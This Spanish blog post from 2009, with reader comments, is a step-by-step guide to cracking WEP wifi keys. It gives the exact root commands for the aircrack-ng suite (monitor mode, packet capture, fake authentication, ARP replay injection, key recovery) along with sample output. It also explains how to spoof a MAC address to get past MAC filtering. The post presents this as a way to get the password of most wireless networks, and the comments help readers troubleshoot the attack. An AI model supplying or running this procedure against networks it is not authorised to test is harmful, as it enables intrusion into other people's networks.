h1

Como obtener contraseñas de redes inalámbricas protegidas con WEP

27/06/2009

Mediante una distribución como Wifislax y una tarjeta wifi como la Alfa Networks AWUS036H (con soporte para la inyección de paquetes), se puede obtener facilmente la contraseña de la mayoría de redes wifi. Para ello, se realiza un ataque en el que se constantemente se intenta autenticar contra el AP, de modo que en cada reto enviado se obtiene información de la clave. Cuando se dispone de suficiente información, se procede a analizarla para probar una clave que encaje con todos los paquetes capturados. Para ello es necesario seguir los siguientes pasos como usuario root:

0º) Si se utiliza Wifislax en arranque USB [ con un Asus EEE ] y [ con una tarjeta Alfa Networks AWUS036H ] es necesario añadir en las opciones de arranque (fase elección de kernel) el parámetro “nohotplug“.

1º) Arrancar el sistema e instalar la tarjeta:
# rmmod rtl8187
# modprobe r8187
# iwconfig wlan0 mode Monitor

Siendo este último paso opcional, ya que airodump-ng lo hará automaticamente en el siguiente paso.

2º) Escanear el espectro wifi en búsqueda de la red a descifrar.
# airodump-ng wlan0

Es conveniente elegir una red con un valor alto de “PWR” (Power, cobertura) para facilitar la transmisión de paquetes o con alto nivel de “beacons”, así como el tipo de cifrado WEP (columna ENC).

3º) Iniciar la grabación, ejecutando airodump-ng y pasándole los parámetros obtenidos en el anterior paso:
# airodump-ng -c CANAL -w FICHERO_CAPTURA --bssid MAC_DEL_AP wlan0

Y se deja esta terminal activa grabando tráfico.

4º) Vincular la estación al AP:
# aireplay-ng -1 0 -a MAC_DEL_AP -h MAC_PROPIA_SI_SE_HA_CAMBIADO -e ESSID wlan0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:00:11:22)
22:47:17 Waiting for beacon frame (BSSID: 00:12:3A:00:00:00) on channel 12
22:47:18 Sending Authentication Request (Open System)
22:47:18 Authentication successful
22:47:18 Sending Association Request [ACK]
22:47:18 Association successful :-) (AID: 1)

5º) Realizar el ataque de repetición de vectores de inicialización:
# aireplay-ng -3 -b MAC_DEL_AP -h MAC_PROPIA_SI_SE_HA_CAMBIADO wlan0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:00:11:22)
22:47:46 Waiting for beacon frame (BSSID: 00:12:3A:00:00:00) on channel 12
Saving ARP requests in replay_arp-0627-224746.cap
You should also start airodump-ng to capture replies.
Read 3 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
(...)
Read 55092 packets (got 2 ARP requests and 2 ACKs), sent 4 packets...(546 pps)
(...)
Read 322692 packets (got 91802 ARP requests and 171137 ACKs), sent 159710 packets...(500 pps)

Es un proceso que durará varios minutos, dejar el terminal abierto y pasar al siguiente punto

6º) Volver a la terminal del punto 3º y observar el campo “data”: a los 10 ó 15 minutos se debe notar un incremento rápido y continuo del valor. Así mismo, si es posible acercarse al AP de modo que mejore la cobertura, se ganará tiempo. Cuando se tenga en el campo data “50.000” o más paquetes, se puede parar el proceso.

7º) Ejecutar aircrack:
# aircrack-ng -s FICHERO_CAPTURA.cap

Notas:
– Es conveniente utilizar las últimas versiones de las aplicaciones propuestas, especialmente en el caso de aircrack-ng donde el tiempo de cálculo para descifrar una clave mejora notablemente.
– Si se desea, se puede cambiar temporalmente la MAC de la tarjeta de red propia antes de comenzar toda la auditoría con el siguiente comando:
# macchanger --mac 00:11:22:33:44:55 wlan0
– Algunos APs tienen filtrado por MAC, lo cual hace más difícil este tipo de ataque. Conviene cambiar la MAC propia por la de una estación vinculada a él, si existe (visible mediante airodump-ng en la parte inferior si hay estaciones vinculadas).
– El paso 6º y 7º se pueden solapar para ganar tiempo. Tan solo es necesario hacer una copia del archivo de captura y ejecutar sobre ella aircrack-ng. Si no se obtienen resultados, en el tiempo en el que se ha realizado el cómputo el fichero origen de captura se habrá incrementado, con lo cual se tendrán más posibilidades:
# cp captura.cap temp.cap
# aircrack-ng temp.cap

No es conveniente ejecutar aircrack-ng sobre el fichero de captura directamente si éste todavía se está modificando.

Anuncios

4 comentarios

  1. hola ise barias capturas me gustaria saver como unir los paquetes para que me quede uno solo
    asi pasarlo por el aircrack-ptw porque solo asepta uno gracias
    contestame a mi masil gracias master


  2. Puedes utilizar mergecap.


  3. hola !! te hago una consulta !! me sale todo bien, hasta esto:
    22:47:18 Sending Authentication Request (Open System)
    22:47:18 Authentication successful
    22:47:18 Sending Association Request [ACK]
    22:47:18 Association successful :-) (AID: 1)

    y luego, en esta parte
    Read 322692 packets (got 91802 ARP requests and 171137 ACKs), sent 159710 packets…(500 pps)
    me dice algo parecido, pero con 0 packets sent :( por que sera??


  4. Tal y como dice, tienes que esperar unos minutos. De todas maneras algunos routers ya están protegidos contra este ataque.

    Un saludo.



Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: